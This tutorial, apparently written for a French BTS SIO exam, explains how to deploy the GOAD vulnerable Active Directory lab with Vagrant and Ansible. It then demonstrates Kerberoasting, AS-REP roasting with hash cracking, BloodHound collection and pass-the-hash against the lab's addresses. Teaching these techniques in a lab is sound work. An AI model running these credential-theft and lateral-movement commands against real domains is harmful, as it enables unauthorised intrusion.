ETHICAL AND LEGAL DISCLAIMER
GOAD is a strictly educational pentest laboratory. Any use outside a controlled educational context is prohibited. Use only on a dedicated infrastructure (VirtualBox/VMware).
GOAD is a strictly educational pentest laboratory. Any use outside a controlled educational context is prohibited. Use only on a dedicated infrastructure (VirtualBox/VMware).
Objective
Deploy a vulnerable Active Directory environment (GOAD) to learn auditing and pentesting techniques on Windows infrastructure (OSCP/CRTE).
Prerequisites
- Host machine with minimum 16 GB RAM
- VirtualBox 7.0+ or VMware Workstation
- Ansible installed (Linux/WSL)
- Vagrant installed
- 250 GB free disk space
GOAD Architecture
5 Windows Server VMs
- DC01 (192.168.56.10): Domain controller NORTH.SEVENKINGDOMS.LOCAL
- DC02 (192.168.56.11): Domain controller SEVENKINGDOMS.LOCAL
- DC03 (192.168.56.12): Domain controller ESSOS.LOCAL
- SRV02 (192.168.56.22): Member server with MSSQL
- SRV03 (192.168.56.23): Member server with IIS/SMB
Built-in vulnerabilities
- Kerberoasting
- AS-REP Roasting
- Golden Ticket / Silver Ticket
- DCSync
- NTLM Relay
- Privilege escalation via GPO
- Pass-the-Hash / Pass-the-Ticket
- Unconstrained / Constrained Delegation
Installation from WSL2 (Windows)
Step 1: Install dependencies
# Update WSL2 Ubuntu sudo apt update && sudo apt upgrade -y # Install Ansible sudo apt install -y ansible python3-pip git # Install pywinrm (required for Ansible → Windows) pip3 install pywinrm # Verify ansible --version
Step 2: Install Vagrant
# Download Vagrant for Linux wget https://releases.hashicorp.com/vagrant/2.4.1/vagrant_2.4.1-1_amd64.deb # Install sudo dpkg -i vagrant_2.4.1-1_amd64.deb # Verify vagrant --version
Step 3: Install VirtualBox on Windows
- Download VirtualBox 7.0+ from virtualbox.org
- Install on Windows (not in WSL)
- Install the VirtualBox Extension Pack
Step 4: Clone GOAD from WSL
cd ~ git clone https://github.com/Orange-Cyberdefense/GOAD.git cd GOAD
Step 5: Configure Vagrant for VirtualBox
# Add Vagrant VirtualBox plugin vagrant plugin install vagrant-vbguest vagrant plugin install vagrant-reload # Configure Vagrant to use Windows VirtualBox export VAGRANT_WSL_ENABLE_WINDOWS_ACCESS="1" export VAGRANT_WSL_WINDOWS_ACCESS_USER_HOME_PATH="/mnt/c/Users/YourUsername"
Step 6: Deploy the VMs
cd ~/GOAD/ad/GOAD/providers/virtualbox
# Launch creation of the 5 VMs (duration: 30-60 min)
vagrant up
Info: Windows Server VMs are automatically downloaded from Vagrant Cloud (Windows Server 2016/2019 boxes).
Step 7: Ansible provisioning
cd ~/GOAD/ansible # Install required Ansible collections ansible-galaxy install -r requirements.yml # Run provisioning (AD configuration + vulnerabilities) ansible-playbook -i ../ad/GOAD/data/inventory -i ../ad/GOAD/providers/virtualbox/inventory main.yml
Total duration: 1h30 to 2h depending on the host machine.
Lab Verification
Connectivity test
# From your Kali/Parrot machine (on same network 192.168.56.0/24)
ping 192.168.56.10
ping 192.168.56.11
ping 192.168.56.12
AD enumeration with CrackMapExec
# Install CME sudo apt install crackmapexec -y # Network scan crackmapexec smb 192.168.56.0/24 # Authentication test (default GOAD credentials) crackmapexec smb 192.168.56.10 -u 'vagrant' -p 'vagrant'
LDAP enumeration
ldapsearch -x -H ldap://192.168.56.10 -D "[email protected]" -w 'vagrant' -b "dc=north,dc=sevenkingdoms,dc=local"
Attack Scenarios (Educational Examples)
1. Kerberoasting with Impacket
# Retrieve Kerberos TGS hashes GetUserSPNs.py -request -dc-ip 192.168.56.10 north.sevenkingdoms.local/vagrant:vagrant # Crack with hashcat hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
2. AS-REP Roasting
# Find accounts without Kerberos pre-auth GetNPUsers.py north.sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile users.txt -format hashcat # Crack hashcat -m 18200 asrep.txt rockyou.txt
3. BloodHound - Attack path analysis
# Install BloodHound sudo apt install bloodhound neo4j -y # Collect data with SharpHound bloodhound-python -d north.sevenkingdoms.local -u vagrant -p vagrant -dc DC01.north.sevenkingdoms.local -c All # Launch neo4j + BloodHound sudo neo4j console bloodhound
4. Pass-the-Hash with CrackMapExec
# After dumping NTLM hashes
crackmapexec smb 192.168.56.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Lab Management
Useful Vagrant commands
# Check VM status vagrant status # Stop all VMs vagrant halt # Start all VMs vagrant up # Destroy the lab completely vagrant destroy -f # Redeploy from scratch vagrant up --provision
VirtualBox Snapshots
Create a snapshot after full installation:
- Open VirtualBox GUI
- Select each GOAD VM
- Machine → Take Snapshot
- Name: "GOAD_Clean_Install"
Allows restoring the lab to a clean state after exercises.
Key Points for the BTS Oral
- GOAD: vulnerable AD environment for pentest training
- Ethical use: never on real infrastructure without authorisation
- Kerberoasting: exploiting SPNs to retrieve TGS hashes
- AS-REP Roasting: exploiting accounts without pre-authentication
- BloodHound: AD attack path mapping tool
- Pass-the-Hash: authentication with NTLM hash without password
- DCSync: AD directory replication to dump all hashes
- Golden Ticket: forged Kerberos TGT creation (krbtgt hash)
- Vagrant + Ansible: infrastructure deployment automation
LEGAL REMINDER
These techniques are presented in an educational BTS SIO SISR context. Their use in real conditions without written authorisation constitutes a criminal offence (French Penal Code art. 323-1 to 323-7). Penalties: up to 5 years imprisonment + €150,000 fine.
These techniques are presented in an educational BTS SIO SISR context. Their use in real conditions without written authorisation constitutes a criminal offence (French Penal Code art. 323-1 to 323-7). Penalties: up to 5 years imprisonment + €150,000 fine.